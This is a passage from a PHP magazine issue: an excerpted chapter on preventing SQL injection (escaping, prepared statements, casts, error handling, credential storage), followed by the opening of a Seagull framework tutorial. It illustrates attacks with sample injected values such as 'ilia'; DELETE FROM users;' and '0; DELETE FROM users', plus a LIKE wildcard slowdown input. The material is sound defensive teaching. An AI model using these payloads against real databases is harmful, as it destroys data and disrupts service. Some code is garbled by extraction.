to nearly 600 In a full application, there are performance gains to be had all along the way You need to look at where your data comes from, how often it changes, and how close to the final presentation format you can get

it to, before it is cached Applications that were not designed with this in mind from the start can be difficult

to retrofit Keep your designs simple and clean Do not use objects as datastores, and try to avoid spaghetti include sequences—your applications will be easier to deploy and will run much faster 

Trang 19

SQL Injection

FEATURE

http://forum.phparch.com/259

The goal of SQL injection is to insert arbitrary

data, most often a database query, into a string

that’s eventually executed by the database

The insidious query may attempt any number

of actions, from retrieving alternate data, to

modifying or removing information from the database

To demonstrate the problem, consider this excerpt:

// supposed input

$name = “ilia’; DELETE FROM users;”;

mysql_query(“SELECT * FROM users WHERE

name=’{$name}’”);

The function call is supposed to retrieve a record from

the users table where the name column matches the

name specified by the user Under normal circumstances,

$name would only contain alphanumeric characters and

perhaps spaces, such as the string ilia But here, by

appending an entirely new query to $name, the call to the database turns into disaster: the injected DELETE query removes all records from users

MySQL Exception

Fortunately, if you use MySQL, the mysql_query()

function does not permit query stacking, or executing multiple queries in a single function call If you try to stack queries, the call fails

However, other PHP database extensions, such as SQLite and PostgreSQL, happily perform stacked queries, executing all of the queries provided in one string and creating a serious security problem

SQL injection is a common vulnerability that is the result of lax

input validation In this excerpted chapter from

php|architect’s Guide to PHP Security , you will learn how to thwart

this type of attack.

by ILIA ALSHANETSKY author of

php|architect’s Guide to PHP Security

SQL INJECTION

Trang 20

SQL Injection

Magic Quotes

Given the potential harm that can be caused by SQL

injection, PHP’s automatic input escape mechanism,

magic_quotes_gpc, provides some rudimentary

protection If enabled, magic_quotes_gpc, or “magic

quotes”, adds a backslash in front of single-quotes,

double-quotes, and other characters that could be used

to break out of a value identifier But, magic quotes

is a generic solution that doesn’t include all of the

characters that require escaping, and the feature isn’t

always enabled Ultimately, it’s up to you to implement

safeguards to protect against SQL injection

To help, many of the database extensions available for

PHP include dedicated, customized escape mechanisms

For example, the MySQL extension for PHP provides the

function mysql_real_escape_string() to escape input

characters that are special to MySQL:

However, before calling a database’s own escaping

mechanism, it’s important to check the state of

magic quotes If magic quotes is enabled, remove any

backslashes (\) it may have added; otherwise, the input

will be doubly-escaped, effectively corrupting it (because

it differs from the input supplied by the user)

In addition to securing input, a database-specific

escape function prevents data corruption For example,

the escape function provided in the MySQL extension is

aware of connection characters and encodes those (and

others) to ensure that data isn’t corrupted by the MySQL

storage mechanism and vice versa

Native escape functions are also invaluable for

storing binary data: left “unescaped”, some binary data

may conflict with the database’s own storage format,

leading to the corruption or loss of a table or the entire

database Some database systems, such as PostgreSQL,

offer a dedicated function to encode binary data

Rather than escape problematic characters, the function

applies an internal encoding For instance, PostgreSQL’s

pg_escape_bytea() function applies a Base64-like

encoding to binary data:

// for plain-text data use:

pg_escape_string($regular_strings);

// for binary data use:

pg_escape_bytea($binary_data);

A binary data escaping mechanism should also be used

to process multi-byte languages that aren’t supported natively by the database system (Multi-byte languages such as Japanese use multiple bytes to represent a single character; some of those bytes overlap with the ASCII range normally only used by binary data.)

There’s a disadvantage to encoding binary data: it prevents persisted data from being searched other than

by a direct match This means that a partial match query such as LIKE ‘foo%’ won’t work, since the encoded value stored in the database won’t necessarily match the initial encoded portion looked for by the query

For most applications, though, this limitation isn’t a major problem, as partial searches are generally reserved for human readable data and not binary data, such as images and compressed files

Prepared Statements

While database-specific escape functions are useful, not all databases provide such a feature In fact, database-specific escape functions are relatively rare (At the moment) only the MySQL, PostgreSQL, SQLite, Sybase, and MaxDB extensions provide them For other databases, including Oracle, Microsoft SQL Server, and others, an alternate solution is required

A common technique is to Base64-encode all values passed to the database, thus preventing any special characters from corrupting the underlying store or causing trouble But Base64-encoding expands data roughly 33 percent, requiring larger columns and more storage space Furthermore, Base64-encoded data has the same problem as binary encoded data in PostgreSQL:

it cannot be searched with LIKE Clearly a better solution

is needed—something that prevents incoming data from affecting the syntax of the query

Prepared queries (also called prepared statements) solve a great many of the aforementioned risks Prepared queries are query “templates”: the structure of the query

is pre-defined and fixed, and includes placeholders that stand-in for real data The placeholders are typically type-specific—for example, int for integer data and

text for strings—which allows the database to interpret the data strictly For instance, a text placeholder is always interpreted as a literal, avoiding exploits such as the query stacking SQL injection A mismatch between

a placeholder’s type and its incoming datum cause, execution errors, adding further validation to the query

In addition to enhancing query safety, prepared queries improve performance Each prepared query is parsed and compiled once, but can be re-used over and over If you need to perform an INSERT en masse, a pre-compiled query can save valuable execution time.Preparing a query is fairly simple Here is an

Trang 21

SQL Injectionexample:

pg_query($conn, “PREPARE stmt_name (text) AS “

” SELECT * FROM users WHERE name=$1”);

pg_query($conn, “EXECUTE stmt_name ({$name})”);

pg_query($conn, “DEALLOCATE stmt_name”);

PREPARE stmt_name (text) AS creates a prepared

query named stmt_name that expects one text value

Everything following the keyword AS defines the actual

query, except $1 is the placeholder for the expected

text

If a prepared statement expects more than one

value, list each type in order, separated by a comma,

and use $1, $2, and so on for each placeholder, as in

PREPARE stmt_example (text, int) AS SELECT *

FROM users WHERE name=$1 AND id=$2

Once compiled with PREPARE, you can run the prepared

query with EXECUTE Specify two arguments: the name of

the prepared statement (such as stmt_name) to run and

a list of actual values enclosed in parentheses

Once you’re finished with the prepared statement,

dispose of it with DEALLOCATE Forgetting to jettison

prepared queries can cause future PREPARE queries to

fail This is a common error when persistent database

connections are used, where a statement can persist

across requests For example, given that there is no way

to check if a statement exists or not, a blind attempt

to create one anyway will trigger a query error if one is

already present

As nice as prepared queries are, not all databases

support them; in those instances escaping mechanisms

should be used

No Means of Escape

Alas, escape functions do not always guarantee data

safety Certain queries can still permit SQL injection,

even after escapes are applied

Consider the following situation, where a query

expects an integer value:

$id = “0; DELETE FROM users”;

$id = mysql_real_escape_string($id); // 0;

DELETE FROM users

mysql_query(“SELECT * FROM users WHERE

id={$id}”);

When executing integer expressions, it’s not necessary

to enclose the value inside single quotes Consequently,

the semicolon character is sufficient to terminate the

query and inject an additional query Since the semicolon

doesn’t have any “special” meaning, it’s left as-is by both

the database escape function and addslashes()

There are two possible solutions to the problem

The first requires you to quote all arguments Since

single quotes are always escaped, this technique prevents SQL injection However, quoting still passes the user input to the database, which is likely to reject the query Here is an illustrative example:

$id = pg_escape_string($id); // 0; DELETE FROM users

pg_query($conn, “SELECT * FROM users WHERE id=’{$id}’”)

or die(pg_last_error($conn)); // will print invalid input syntax for integer: // “0; DELETE FROM users”

But query failures are easily avoided, especially when validation of the query arguments is so simple Rather than pass bogus values to the database, use a PHP cast

to ensure each datum converts successfully to the desired numeric form

For example, if an integer is required, cast the incoming datum to an int; if a complex number is required, cast to a float

$id = (int) $id; // 123 pg_query($conn, “SELECT * FROM users WHERE id={$id}”);

// safe

A cast forces PHP to perform a type conversion If the input is not entirely numeric, only the leading numeric portion is used If the input doesn’t start with a numeric value or if the input is only alphabetic and punctuation characters, the result of the cast is 0 On the other hand,

if the cast is successful, the input is a valid numeric value and no further escaping is needed

Numeric casting is not only very effective, it’s also efficient, since a cast is a very fast, function-free operation that also obviates the need to call an escape routine

The LIKE Quandary

The SQL LIKE operator is extremely valuable: its % and _

(underscore) qualifiers match 0 or more characters and any single character, respectively, allowing for flexible partial and substring matches However, both LIKE

qualifiers are ignored by the database’s own escape functions and PHP’s magic quotes Consequently, user input incorporated into a LIKE query parameter can subvert the query, complicate the LIKE match, and in many cases, prevent the use of indices, which slows a query substantially With a few iterations, a compromised

LIKE query could launch a Denial of Service attack by overloading the database

Here’s a simple yet effective attack:

Trang 22

SQL Injection

$sub = mysql_real_escape_string(“%something”);

// still %something

mysql_query(“SELECT * FROM messages “

“WHERE subject LIKE ‘{$sub}%’”);

The intent of the SELECT above is to find those messages

that begin with the user-specified string, $sub

Uncompromised, that SELECT query would be quite fast,

because the index for subject facilitates the search But

if $sub is altered to include a leading % qualifier (for

example), the query can’t use the index and the query

takes far longer to execute—indeed, the query gets

progressively slower as the amount of data in the table

grows

The underscore qualifier presents both a similar and a

different problem A leading

underscore in a search

pattern, as in _ish, cannot

be accelerated by the

index, slowing the query

And a trailing underscore

may substantially alter

the results of the query

To complicate matters

further, underscore is a

very common character

and is frequently found in

perfectly valid input

To address the LIKE

quandary, a custom

escaping mechanism must

convert user-supplied % and

_ characters to literals Use

addcslashes(), a function

that lets you specify a

character range to escape

$sub = addcslashes(mysql_real_escape_

string(“%something_”),

“%_”);

// $sub == \%something\_

mysql_query(“SELECT * FROM messages “

”WHERE subject LIKE ‘{$sub}%’”);

Here, the input is processed by the database’s

prescribed escape function and is then filtered through

addcslashes() to escape all occurrences of % and

_ addcslashes() works like a custom addslashes(),

is fairly efficient, and much faster alternative than

str_replace() or the equivalent regular expression

Remember to apply manual filters after the SQL

filters to avoid escaping the backslashes; otherwise,

the escapes are escaped, rendering the backslashes as

literals and causing special characters to re-acquire

special meanings

SQL Error Handling

One common way for hackers to spot code vulnerable

to SQL injection is by using the developer’s own tools against them For example, to simplify debugging of failed SQL queries, many developers echo the failed query and the database error to the screen and terminate the script

for any number of reasons.) Besides being embarrassing, the code may reveal a great deal

of information about the application or the site For instance, the end-user may be able discern the structure of the table and some of its fields and may

be able to map GET/POST parameters to data to determine how to attempt

a better SQL injection attack In fact, the SQL error may have been caused by an inadvertent SQL injection Hence, the generated error becomes a literal guideline to devising more tricky queries.The best way to avoid revealing too much information

is to devise a very simple SQL error handler to handle SQL failures:

function sql_failure_handler($query, $error) { $msg = htmlspecialchars(“Failed Query:

{$query} ”

.”SQL Error: {$error}”);

error_log($msg, 3, “/home/site/logs/sql_error_ log”);

if (defined(‘debug’)) { return $msg;

} return “Requested page is temporarily unavailable, “

.”please try again later.”;

} mysql_query($query)

Trang 23

SQL Injection

The handler function takes the query and error message

generated by the database and creates an error string

based on that information The error string is passed

through htmlspecialchars() to ensure that none of the

characters in the string are rendered as HTML, and the

string is appended to a log file

The next step depends on whether or not the script is

working in debug mode or not If in debug mode, the error

message is returned and is likely displayed on-screen for

the developer to read In production, though, the specific

message is replaced with a generic message, which hides

the root cause of the problem from the visitor

Authentication Data Storage

Perhaps the final issue to consider when working with

databases is how to store your application’s database

credentials—the login and password that grant access

to the database Most applications use a small PHP

configuration script to assign a login name and password

to variables This configuration file, more often than

not (at least on shared hosts), is left world-readable

to provide the web server user access to the file But

world-readable means just that: anyone on the same

system or an exploited script can read the file and steal

the authentication information stored within Worse,

many applications place this file inside web readable

directories and give it a non-PHP extension—.inc is a

popular choice Since inc is typically not configured to

be interpreted as a PHP script, the web browser displays

such a file as plain-text for all to see

One solution to this problem uses the web server’s

own facilities, such as htaccess in Apache, to deny

access to certain files As an example, this directive

denies access to all files that end (notice the $) with

the string inc

Order allow,deny Deny from all

</Files>

Alternatively, you can make PHP treat inc files as scripts

or simply change the extension of your configuration files to php or, better yet, inc.php, which denotes that the file is an include file

However, renaming files may not always be the safest option, especially if the configuration files have some code aside from variable initialization in the main scope The ideal and simplest solution is to simply not keep configuration and non-script files inside web server-

A proper solution must ensure that other users on the system have no way of seeing authentication data Fortunately, the Apache web server provides just such

a mechanism The Apache configuration file, httpd.conf can include arbitrary intermediate configuration files during start-up while Apache is still running as root Since root can read any file, you can place sensitive information in a file in your home directory and change

it to mode 0600, so only you and the superuser can read and write the file

One common way for hackers to spot

code vulnerable to SQL injection is by using the developer’s own tools against them.

Trang 24

SQL Injection

Include /home/ilia/sql.cnf

</VirtualHost>

If you use the Include mechanism, be sure that your

file is only loaded for a certain VirtualHost or a certain

directory to prevent the data from being available to

other hosts on the system

The content of the configuration file is a series of

SetEnv lines, defining all of the authentication parameters

necessary to establish a database connection

SetEnv DB_LOGIN “login”

SetEnv DB_PASSWD “password”

SetEnv DB_DB “my_database”

SetEnv DB_HOST “127.0.0.1”

After Apache starts, these environment variables are

accessible to the PHP script via the $_SERVER super-global

or the getenv() function if $_SERVER is unavailable

echo $_SERVER[‘DB_LOGIN’]; // login

echo getenv(“DB_LOGIN”); // login

An even better variant of this trick is to hide the

connection parameters altogether, hiding them even

from the script that needs them Use PHP’s ini directives

to specify the default authentication information for the

database extension These directives can also be set

inside the hidden Apache configuration file

php_admin_value mysql.default_host “127.0.0.1”

php_admin_value mysql.default_user “login”

php_admin_value mysql.default_password

“password”

Now, mysql_connect() works without any arguments, as

the missing values are taken from PHP ini settings The

only information remaining exposed would be the name

of the database

Because the application is not aware of the database

settings, it consequently cannot disclose them through a

bug or a backdoor, unless code injection is possible In fact,

you can enforce that only an ini-based authentication

procedure is used by enabling SQL safe mode in PHP

via the sql.safe_mode directive PHP then rejects any

database connection attempts that use anything other

than ini values for specifying authentication data

This approach does have one weakness in older

versions of PHP: up until PHP 4.3.5, there was a bug in

the code that leaked ini settings from one virtual host

to another Under certain conditions, this bug could be

triggered by a user, effectively providing other users on

the system with a way to see the ini values of other

For example, if a user only requires read-access to the database, don’t permit the user to execute UPDATE or

INSERT queries Or more realistically, limit write access

to those tables that are expected to change—perhaps the session table and the user accounts table

By limiting what a user can do, you can detect, track, and defang many SQL injection attacks Limiting access

at the database level is supplemental: you should use it

in addition to all of the database security mechanisms listed in this chapter

Maintaining Performance

Speed isn’t usually considered a security measure, but subverting your application’s performance is tantamount

to any other exploit As was demonstrated by the LIKE

attack, where % was injected to make a query very slow, enough costly iterations against the database could saturate the server and prevent further connections Unoptimized queries present the same risk: if the attacker spots inefficiencies, your server can be exhausted and rendered useless just the same

To prevent database overloading, there are a few simple rules to keep in mind

Only retrieve the data you need and nothing more Many developers take the “*” shortcut and fetch all columns, which may result in a lot of data, especially when joining multiple tables More data means more information to retrieve, more memory for the database’s temporary buffer for sorting, more time to transmit the results to PHP, and more memory and time to make the results available to your PHP application In some cases, with large amounts of data, database sorting must be done within a search file instead of memory, adding to the overall time to process a request Again, only retrieve the data you need, and name the columns to minimize size further

To further accelerate a query, try using unbuffered queries that retrieve query results a small portion at a time However, unbuffered queries must be used carefully: only one result cursor is active at any time, limiting you

to work with one query at a time (And in the case of

Trang 25

SQL Injection

MySQL, you cannot even perform INSERT, UPDATE, and

other queries until all results from the result cursor have

been fetched)

To work with a database, PHP must establish a

connection to it, which in some cases can be a rather

expensive option, especially when working with complex

systems like Oracle, PostgreSQL, MSSQL, and so on

One trick that speeds up the connection process is to

make a database connection persistent, which allows

the database handle to remain valid even after the

script is terminated If a connection is persistent, each

subsequent connection request from the same web server

process reuses the connection rather than recreating it

anew

The code below creates a persistent MySQL database

connection via the mysql_pconnect() function, which is

syntactically identical to the regular mysql_connect()

function

mysql_pconnect(“host”, “login”, “passwd”);

Other databases typically offer a persistent connection

variant, some as simple as adding the prefix “p” to the

word “connect”

Anytime PHP tries to establish a persistent connection,

it first looks for an existing connection with the same

authentication values; if such a connection is available,

PHP returns that handle instead of making a new one

Words of Caution

Persistent connections are not without drawbacks For

example, in PHP, connection pooling is done on a

per-process basis rather than per-web server, giving every

web-server process its own connection pool So, 50 Apache

processes result in 50 open database connections If the

database is not configured to allow at least that many

connections, further connection requests are rejected,

breaking your web pages

In many cases, the database runs on the same machine

as the web server, which allows data transmission to be

optimized Rather than using the slow and bulky TCP/IP,

your application can use Unix Domain Sockets (UDG), the

second fastest medium for Inter Process Communication

(IPC) By switching to UDG, you can significantly improve

the data transfer rates between the two servers

To switch to UDG, change the host parameter of the

connection For example, in MySQL, set the host, followed

by the path to the UDG

Query Caching

In some instances, a query is as fast as it can be, yet still takes significant time to execute If you cannot throw hardware at the problem—which has its limits as well—try to use the query cache A query cache retains

a query’s results for some period of time, short-circuiting the need to recreate the results from scratch each time the same query runs

Each time there’s a request for a page, the cache is checked; if the cache is empty, if the cache expired the previous results, or if the cache was invalidated (say, by

an UPDATE or an INSERT), the query executes Otherwise, the results saved in the cache are returned, saving time and effort 

ILIA ALSHANETSKY is the principal of Advanced Internet Designs Inc., which specializes in security auditing, performance analysis and application development He is the author of FUDforum (http://fudforum.org), a highly popular, Open Source bulletin board, focused on providing the maximum functionality at the highest levels

of security and performance Ilia is a core PHP Developer, an active member of PHP’s QA team, and was the Release Master for the PHP 4.3.x series He has authored and co-authored a number of extensions, most notably SHMOP, PDO, SQLite and GD, and is responsible for a large number of bug fixes and performance tweaks in the language

A prolific lecturer and writer, Ilia can found speaking at international conferences He is frequently published in print and online magazines

on a variety of PHP topics, and is also the author of an upcoming book

on PHP security Ilia can be reached at ilia@ilia.ws.

dynamic web pages - german php.node

news scripts tutorials downloads books installation hints

www.dynamicwebpages.desex could not be better |

Trang 27

This article teaches developers to create sites quickly,

by concentrating on application-specific code and letting the Seagull PHP framework handle the rest

A web framework is a necessity when developing

a serious website Programmers should not

recreate basic web elements when great tools

to help them get the job done already exist

One of these tools, Ruby on Rails, garnered

much attention when it was released in July 2004 It

simplified Ruby development, separated data from

display, and made web development fun

Various PHP frameworks exist, including a

Rails clone called Cake http://www.cakephp.org

which is still early in development This article will

concentrate on another framework, one called Seagull

(http://seagull.phpkitchen.com) It’s fast, secure, has

very clean code and doesn’t look half bad, either

Seagull is a BSD licensed , object oriented application

LINKS:

http://seagull.phpkitchen.com http://seagull.phpkitchen.com/apidocs/

http://pear.php.net/package/HTML_Template_Flexy

FLOCKING TO

SEAGULL

Trang 28

Flocking to Seagull

built on solid, heavily-tested tools, and uses more than a

few PEAR libraries for many of its tasks It is very easy to

install, using the PEAR-installer, and offers a web-based

installation procedure It uses good coding practices such

as design patterns, database abstraction and separation

of content and presentation

Seagull frees developers from repetitive programming

tasks and lets them concentrate on application-specific

code It is completely modular, so new features can

easily be added to the system The developer community

also pays considerable attention to maintaining a cleanly

structured codebase, observing security guidelines and

respecting web standards like XHTML and CSS

Although it has a very low release number, this

framework offers much functionality like user and

permission management and some ready-to-use

modules like Publisher—a lightweight CMS—a

contact-us module, a guestbook module, a module for setting

up a list of FAQs (Frequently Asked Questions) and

even a shopping cart It also has a front controller

that lets you easily create search engine friendly

URLs like http://www.example.com/index.php/

contactus/action/list/

The project was started in 2001 by Demian Turner,

who wanted to create a simple and stable framework,

using innovative design patterns for his project Since

October 2003, the project has been hosted on SourceForge

(http://www.sourceforge.net/projects/seagull/)

You may be wondering where Seagull got its name:

Demian Turner was on a ferry surrounded by some

seagulls As the birds were coasting along with the

boat, they twisted their necks to get a better view of

the passengers He found this really interactive (for the

birds) and he thought the main focus of a framework should be interactivity That’s why it’s called Seagull

If you’ve never used a web framework, you may wonder if the advantages of such a system outweigh the cost of learning how to use it You may think that since creating sites from scratch has worked, you should continue doing things that way All we ask is that you follow this tutorial to create a simple site with Seagull

If you find it doesn’t save you time, don’t use it If you wonder how you ever lived without it, great! If you have used a web framework before, the following tutorial will introduce you to Seagull and give you a handle on its various idiosyncrasies

This tutorial will walk you through the steps of creating a medium sized application with Seagull We will need to install the framework, create a few users, manage permissions, use various modules (like the CMS module for sharing articles) and, last but not least, modify the look and feel so it fits with your corporate identity Additionally, we will create a new module called

“wish list,” in which users will be able to sign up and add/edit/delete items from their wish lists, which will be publicly viewable This is a simple application, but one practical enough to give you all the tools necessary to create your own site Let’s get started!

Model-View-Controller

Seagull uses the Model View Controller pattern For an introduction to the MVC pattern, see the May 2003 issue of php|architect (https://www.phparch.com/issue.php?mid=9)

Figure 1 shows how MVC is implemented in Seagull

Seagull frees developers from repetitive programming tasks and lets them concentrate

on application-specific code.

Trang 29

Flocking to Seagull

In detail:

• Root directory: init.php and constants.php

• etc/: basic configuration files, SQL files, etc

• lib/: libraries (Seagull, PEAR and other) and data files like arrays for country names or languages in lib/data/

• modules/: each module has its own subdirectory

• var/: for all temporary data like compiled templates, DB_DataObject entities, log files and sessions This directory must be writeable

by the webserver

• www/: application webroot which contains the front controller script, themes and Javascript Only this directory should be viewable to the web; otherwise, make sure to protect the others with htaccess files

Basic Classes

Basic tasks like connecting to a database, sending emails

or formatting output are done using the Seagull Base Classes, contained in /lib/SGL/ These classes provide Seagull with its basic functionality and do not need

to be completely understood before using Seagull We advise you to become familiar with these classes when you get the chance, however, as it will give you a greater understanding of the framework, itself For a deeper look

at these classes please visit the API documentation at the project homepage.

System Architecture

The framework consists of:

• base framework: The framework itself is made

up of a set of base classes, organized according

to the MVC design pattern, that take care of

permissions, authentication, sessions, input/

output and database abstraction

• modules: Each generalized area of functionality

comes in the form of a module that is

associated with manager classes, blocks, or

items You may find your business requirements

already implemented in one of these pre-made

modules

• libraries: Most task-specific functionality

comes from libraries, which are quite often

from PEAR (http://pear.php.net) These

libraries can be independently updated when

upgrades/improvements are available

• entities/entity managers: Each object in the

application such as Member, Group, Property,

Document, Article, etc is represented by

an entity You can quickly prototype entities

using the tools Seagull provides to create

skeleton classes

Directory Structure

Before starting to use Seagull, let’s have a look at the

directories it contains You can see the complete structure

in Figure 2

FIGURE 1

Trang 30

Flocking to Seagull

Templates and Themes

Seagull uses templates and themes

for separating data from layout

By default, the PEAR package

HTML_Template_Flexy is used

Flexy compiles all HTML templates

into PHP scripts that are never

edited by the developer You also

won’t need to worry that template

files are being parsed every time a

request is made

By using templates, you can

FIGURE 2

FIGURE 3

split the jobs for programming and designing to different people This way,

a designer will never have access to the program logic and will be unable to ruin your carefully crafted code

A theme, in turn, is a collection of directories placed in www/themes/ Each subdirectory contains the HTML templates for the module it represents

Installation

Installing Seagull is very easy All you need is a webserver (like Apache or IIS), PHP (version 4.1 or newer—PHP 5 works, too), and a database (e.g MySQL, PostreSQL, Oracle) before you can begin

First, download the most recent version of Seagull from the project homepage, and unpack it into your webroot directory

Alternatively, you can use the PEAR Package manager This method is the easiest and fastest way to get Seagull up and running, but there are a few requirements:

• You must be running a recent version of PHP 4.3.4+ with the base PEAR packages installed

• You must set the pear data_dir to your webroot, or point it to anywhere on your filesystem, and subsequently create a virtual host

to expose the www directory This is done with the -d data_dir=/ path/to/data/dir switch To view your current settings use

pear config-show

• Your preferred package state must be set to alpha The current state of the Seagull project is stable, but there is a dependency on the Validate library, which has been alpha for ages now

So, to install Seagull using the PEAR installer, type the following on the command line (on one line):

pear -d data_dir=/path/to/web/root \ -d preferred_state=alpha install \ onlyreqdeps \

0.4.5.tgz

http://kent.dl.sourceforge.net/sourceforge/seagull/seagull-Once you have performed the installation with the PEAR package manager, don’t forget to revert your PEAR configuration settings to their original state

Now, let’s continue the installation process

Tiêu đề	Focus on Security
Tác giả	Ilia Alshanetsky, Ben Ramsey, William Zeller, Werner M. Krauss, Chris Shiflett, Rubén Martínez Ávila, Peter MacIntyre, Marco Tabini
Trường học	Nexcess.net
Chuyên ngành	Computer Science / Web Security
Thể loại	Tài liệu
Thành phố	Ann Arbor

Định dạng
Số trang	60
Dung lượng	4,01 MB